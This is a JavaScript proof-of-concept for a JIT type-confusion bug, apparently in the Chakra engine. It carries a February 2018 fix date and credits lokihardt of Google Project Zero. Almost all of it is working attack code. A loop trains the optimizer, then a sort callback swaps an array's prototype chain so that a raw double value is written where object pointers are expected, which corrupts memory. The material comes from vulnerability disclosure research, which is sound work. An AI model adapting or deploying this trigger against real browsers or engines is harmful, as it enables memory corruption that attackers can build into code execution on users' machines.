- Fix: Feb 2018
- Credit: lokihardt of Google Project Zero
function opt(arr, arr2) {
arr2[0];
arr[0] = 1.1;
arr2.reverse();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
arr.__proto__ = null; // avoid inline caching
delete arr[1]; // avoid doArrayMissingValueCheckHoist
let arr2 = [, {}];
arr2.__proto__ = {};
arr2.reverse = Array.prototype.reverse;
for (let i = 0; i < 10000; i++) {
opt(arr, arr2);
}
Array.prototype.sort.call(arr, () => {
arr2.__proto__.__proto__ = arr;
});
opt(arr, arr2);
print(arr[0]);
}
main();